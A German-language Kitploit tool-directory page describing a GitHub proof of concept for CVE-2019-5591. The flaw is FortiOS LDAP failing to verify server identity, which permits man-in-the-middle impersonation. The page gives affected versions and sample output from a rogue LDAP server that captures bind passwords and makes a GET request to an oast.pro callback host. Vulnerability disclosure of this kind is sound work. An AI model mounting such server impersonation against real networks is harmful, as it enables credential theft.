Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
fortios-ldap-mitm-poc-CVE-2019-5591 — Die Standardkonfiguration von LDAP auf FortiOS v6.0.x bis v6.2.0 überprüft die Serveridentität für LDAP/S nicht, was zu MITM-Angriffen führt. Dieser PoC demonstriert die vollständige Exfiltration von Anmeldedaten, die im lokalen Subnetz an einen LDAP-Server gesendet werden, der leicht zu imitieren ist. | Kitploit
Tools/GitHubGitHub/ayewo/fortios-ldap-mitm-poc-cve-2019-5591
SchwachstellenanalyseExploitationInformationsbeschaffungNetzwerksicherheitPenetrationstestsAuthentifizierung
GitHubayewo/fortios-ldap-mitm-poc-cve-2019-5591

fortios-ldap-mitm-poc-CVE-2019-5591

Repository anzeigen
12vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Die Standardkonfiguration von LDAP auf FortiOS v6.0.x bis v6.2.0 überprüft die Serveridentität für LDAP/S nicht, was zu MITM-Angriffen führt. Dieser PoC demonstriert die vollständige Exfiltration von Anmeldedaten, die im lokalen Subnetz an einen LDAP-Server gesendet werden, der leicht zu imitieren ist.

Teilen

CVE-2019-5591

Dieses Proof of Concept (PoC) demonstriert einen MITM-Angriff (Man-in-the-Middle): die Imitation eines LDAP-Servers im lokalen Subnetz eines FortiGate-Geräts, auf dem eine verwundbare Version von FortiOS läuft.

Betroffene Versionen

Diese Versionen sind verwundbar:

VersionBetroffenLösung
FortiOS 7.0Nicht betroffenNicht zutreffend
FortiOS 6.06.0.3 bis 6.2.0Upgrade auf 6.2.1 oder höher

Erkennung in Aktion

Für das PoC wurde FortiOS 6.2.0 in VMware Fusion verwendet.

root@kitploit:~

[2025-10-16 22:59:47.366765] New connection from 192.168.43.24:54789

--- Request #1 ---
BIND Request:
  Message ID: 1
  DN: cn=admin,dc=example,dc=com
  Password: ldapAdMiNPassw0rd!
  -> Sent BIND Response (Success)

--- Request #2 ---
SEARCH Request:
  Message ID: 2
  Base DN: dc=example,dc=com
  Filter: 

cn
nLBkcjDTHC01.1...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #3 ---
BIND Request:
  Message ID: 3
  DN: dc=example,dc=com
  Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro

🔑 CAPTURED PASSWORD: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
🔧 No scheme found — prepending https:// -> https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
📡 Attempting GET request to: https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
✅ GET request successful! Status code: 200
  -> Sent BIND Response (Success)

--- Request #4 ---
SEARCH Request:
  Message ID: 4
  Base DN: dc=example,dc=com
  Filter: 


objectclass0memberOfprimaryG...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #5 ---

[2025-10-16 22:59:49.159193] Connection closed from 192.168.43.24:54789

============================================================
SESSION SUMMARY - Captured Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
============================================================

Beschreibung

Die Standardkonfiguration von LDAP auf FortiOS v6.0.x bis v6.2.0 prüft die Serveridentität für LDAP/S nicht, was zu MITM-Angriffen führt. Dieses PoC demonstriert die vollständige Exfiltration von Anmeldedaten, die im lokalen Subnetz an einen leicht zu imitierenden LDAP-Server gesendet werden.

Tool herunterladen